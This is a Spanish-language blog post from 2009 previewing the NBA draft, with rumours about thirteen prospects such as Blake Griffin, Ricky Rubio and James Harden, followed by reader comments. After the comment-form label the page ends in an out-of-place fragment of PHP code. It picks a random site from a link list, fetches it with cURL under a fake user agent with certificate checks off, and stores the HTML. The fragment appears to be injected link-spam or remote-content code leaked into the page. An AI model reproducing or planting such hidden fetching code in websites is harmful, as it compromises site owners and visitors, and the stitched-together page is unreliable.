A 4 días del draft

22 de June de 2009 por txusma

El 25 de Junio (26 para nosotros) se acerca y las incógnitas permanecen más allá del número 1 del draft, que será, con toda seguridad, Blake Griffin. Como ya hemos podido comprobar se trata de uno de los drafts más inciertos de los últimos años y es que los rumores y las predicciones se pisan unos a otros a velocidades vertiginosas.

Lo que de momento es segura es la lista de jugadores que estarán presentes en el Madison Square Garden el día del draft. Esta lista suele ser la confirmación de que los jugadores presentes en ella serán drafteados en los puestos de lotería o no mucho después aunque siempre hay excepciones, como la de Maciej Lampe en 2003 que a pesar de ser invitado a la ceremonia del draft fue elegido en segunda ronda.

Aprovecharemos la lista para ir repasando algunas noticias y rumores aparecidos en los últimos días:

1. Blake Griffin: Como no puede ser de otra manera, el clarísimo número 1 del draft de este año no podía faltar a la cerimonia. Los Clippers ya parecen haber decidido definitivamente no traspasar su elección pero hasta el último momento cualquier cosa es posible.

2. James Harden: Harden se ha situado tercero en los mocks en los últimos días por delante de Ricky Rubio en incluso aparece como la elección de Memphis en el 2 en algunas puestas. La razón principal es que tanto Rubio como Thabeet (los otros 2 jugadores que optan al número 2) ya han declarado que no les ilusiona jugar en la franquicia de Tennesse. El problema de Harden, aparte de ocupar la misma posición en el campo que OJ Mayo, es que su workout con Memphis fue terrible, palabras textuales de uno de los entrenadores.

3. Hasheem Thabeet: El pívot tanzano parece ser que sufre una lesión en el hombro que ha provocado la cancelación del workout que tenía previsto con los Memphis Grizzlies. Realmente a Thabeet tampoco le interesa realizar workouts individuales con los equipos porque según su entorno no mostraría sus principales virtudes (intimidación, tapones…) y en cambio si que se acentuarían sus carencias. En todo caso, la noticia ha añadido más incertidumbre si cabe a esas 2-3 elecciones tras Blake Griffin.

4. Ricky Rubio: El equipo más interesado continúa siendo Sacramento pero aún no está claro si esperarán a que el español les llegue al número 4 (como apuntan la mayoría de mocks) o intentarán un traspaso para conseguir la segunda elección. Se rumoreaba un Num 2 x Num 4 + Jason Thompson, rápidamente negado por la franquicia de California. Ricky y su família también se han entrevistado con los Oklahoma City Thunder que disponen de la tercera elección. Los Wolves, al revés de lo que apuntaba algún rumor la semana pasada, no tienen pensado ofrecer a Kevin Love a Memphis por el número 2 sinó que están intentando conseguir el número 5 de los Wizards (con alguna combinación que implique el número 18, Randy Foye o Mike Miller) para intercambiarlo por el 2 de Memphis.

5. Jordan Hill: El hasta hace poco más de un mes número 2 de los mocks draft, ha visto cbajar su bajar su cotización y ahora mismo todas las apuestas le dan entre el número 5 y el número 7. De toda manera parece ser objetivo prioritario de franquicias como los Dallas Mavericks o los Milwaukee Bucks. Los tejanos podrían estar en conversaciones con los Wizards por esa quinta elección tan deseada mientras que los Bucks simplemente quedarían al acecho por si el ex de Arizona cae más de la cuenta. Los Wizards, por si mantienen su quinta elección, ya han programado un workout a solas con él el jueves.

6. Tyreke Evans: Hace 3 días los Wolves llevaron a cabo un workout con algunos de los mejores bases de la promoción (Evans, Flynn, Jennings, Lawson, Holiday y Teague) y Evans dominó todos y cada uno de las secciones del entrenamiento, por lo que apunta a conseguir esa sexta elección. Después ya veremos como se entiende con Randy Foye.

7. Stephen Curry: Curry sigue siendo el oscuro objeto del deseo de unos Knicks que tienen asumido que no llegará a su octava elección y que de hecho se están moviendo para conseguir una mejor posición en el draft (como la quinta de los Wizards) para escogerlo. Fuentes fiables apuntan a que es el principal objetivo de los Warriors, si es que llega a esa séptima elección.

8. Jonny Flynn: El ex-base de Syracuse ha llevado a cabo varios workouts (Wolves, Warriors, Kings) con éxito y está considerado como un jugador que puede aportar desde el primer momento y como un gran defensor exterior.

9. Demar DeRozan: El privilegiado físico de DeMar DeRozan sigue sorprendiendo y a pesar de lo que apuntaban algunos rumores, las posibilidades que sea escogido por los Raptors en el número 9 son muy elevadas. Los entrenadores de los Raptors lo han comparado con Andre Iguodala. El ex de USC también ha realizado workouts con los Kings y los Wolves.

10. Jrue Holiday: Justamente hoy Holiday está realizando su segundo workouts con los Knicks y hay dos posibles razones totalmente opuestas para ello. Por un lado, Holiday podría ser el plan B de New York en el caso que no consiguieran hacerse con los servicios de Stephen Curry y por el otro, los Knicks podrían estar simplemente inflando el valor de Holiday para que suba posiciones en el draft y les llegue a la octava elección su auténtico objetivo (evidentemente Curry). De toda manera, el primer workout de Holiday en la Gran Manzana fue todo un éxito.

11. Gerald Henderson: Todos los mocks apuntan que Henderson será escogido en la duodécima elección por los Charlotte Bobcats a pesar de que no está realizado unos buenos workouts. El último con los Raptors fue decepcionante.

12. Brandon Jennings:En el mismo workout que comentábamos antes de los Wolves, Jennings demostró que aún está muy verde pero que es, sin duda, el base con mayor futuro (Ricky aparte) de esta generación. Por eso, no se descarta que aparezca en el número 6.

13. Tyler Hansbrough: Physco-T ha ido escalando posiciones en los mocks gracias a su principal virtud: la energía y determinación que desprende su juego. De hecho, el domingo realizó un workout con unos Hawks (decimonovena elección) que quedaron impresionados sobretodo de su intensidad pero también de su condición atlética y su calidad. Algunos le sitúan en la elección de los New Jersey Nets, la número 11. Habrá que esperar al workout que tienen planeado mañana mismo.

Comenta

7 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Pues la defensa ha sido siempre uno de los defectos de Flynn.

    Lo otro es demasiado lio para comentar, jeje, pero desde luego Hansbrough puede aportar 20 minutos de calidad en cualquier equipo.

      Citar

  2. Txusma dice:
    #2

    Pues en el workout de point guards de Minnessota lo hizo bastante bien. De hecho fue el unico q pudo parar en algun momento a Tyreke Evans…

      Citar

  3. TheDeerHunter dice:
    #3

    Ha salido el último mock draft que se ha currado Chard Ford en la ESPN.
    Descarta por completo a Ricky para Memphis (bieeeeen… ¿??) al haber él rechazado su visita allí. Anda que Thabeet se ha peleado con alguien para que le vean. Están más tontos que una piedra… lo mejor que podrían hacer es traspasar el pick.

    En el resto muchas dudas en el último momento. No me extrañaría ver sorpresas desagradables. Hasta se dice que en Sacramento andan preocupados por el tamaño y físico de Ricky, además de su contrato. Mantiene a Ricky en el 3 para los Thunder pero cobran mucha fuerza tanto Harden, como Curry y Evans para pasarle la noche del draft.
    Hay que ver en menudo fregado se ha metido el chaval. Yo estaría acojonado… aunque claro, no soy ni 100000000 de veces tan bueno como él en esto del baloncesto.

      Citar

  4. Txusma dice:
    #4

    Va a ser un draft bonito de ver, porque entre la eleccion 2 y la 15, mas o menos, estoy seguro de que va a haber muchas sorpresas y muchos traspasos. Lo de Thabeet y sus “lesiones” esta mosqueando a mas de uno y Harden tampoco acaba de convecer pq, aunq todos tienen claro q tiene clase, su mala March Madness y sus malos workouts pesan un poquito. De esta manera, el 2 deberia ser clarament para Ricky pero claro, el catalan ya ha dicho que ni hablar de jugar en Memphis. O pillan a Thabeet o traspasan el pick.
    Las declaraciones de Sacramento q comentas yo lo veo más como un farol:. Expresan dudas para q Ricky les llegue sin tener q subir posiciones en el draft.
    Y ojito a los 2 q comentas Deer, Curry y Evans. No me extrañaria q tal como estan las cosas acaben metiendose entre medio de los Thabeet, Harden y Rubio.

      Citar

  5. Kantonyo dice:
    #5

    Hay rumores importantes de que Minnesota Wolves, busca la plaza quinta del draft de Wizards, y ha ofrecido a Miller y Foye a cambio. Todo ello para buscar la elección de RICKY RUBIO, que parece que será elegido por MEMPHIS en segunda posición sólo para buscar recompensa, ya que tienen claro que el catalán no quiere jugar en la franquicia de Tennesse.

    Los Wolves dispondrían de la 5, 6 y 18 selección de primera ronda para pujar por Ricky y Memphis a cambio tendría más posibilidades para rehacer su plantilla con dos buenas elecciones.

      Citar

  6. Dantley dice:
    #6

    Confirmado el trade, pick 5 x Miller + Foye.

    5 + 6 x 2 puede ser excesivo, a ver qué piensa Memphis de un 5 + 18 x 2, y seguro que algún tema de ajuste salarial pedirán. Con un 2 + 6, la verdad es que los Wolves tienen muchas posibilidades, si el 2 es Ricky, el 6 pudiera ser Harden si llega, el problema es que si no llega, lo mejor disponble podría ser Hill o un base, lo cual sería menos interesante.

    Por cierto, también tienen la 28 y un par de segundas. Vamos, estrategia de fantasy league total, reconstrucción mode ¡¡¡

    La verdad es que un hipotético Rubio, Harden, Love, Jefferson, hueco salarial y posiblemente algún otro pick bueno para 2010 no tiene mala pinta, pero hace falta mucha paciencia.

      Citar

  7. Viva_Dirk dice:
    #7

    Ufff, me parece que se han calentado mucho los Wolves. Foye es una pieza muy interesante y el 5 no vale tanto aunque sea para hacerse con el Nº2.

    Ricky-Harden-FA-Love-Jefferson suena muy bien, pero ese FA tiene que ser muy bueno.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>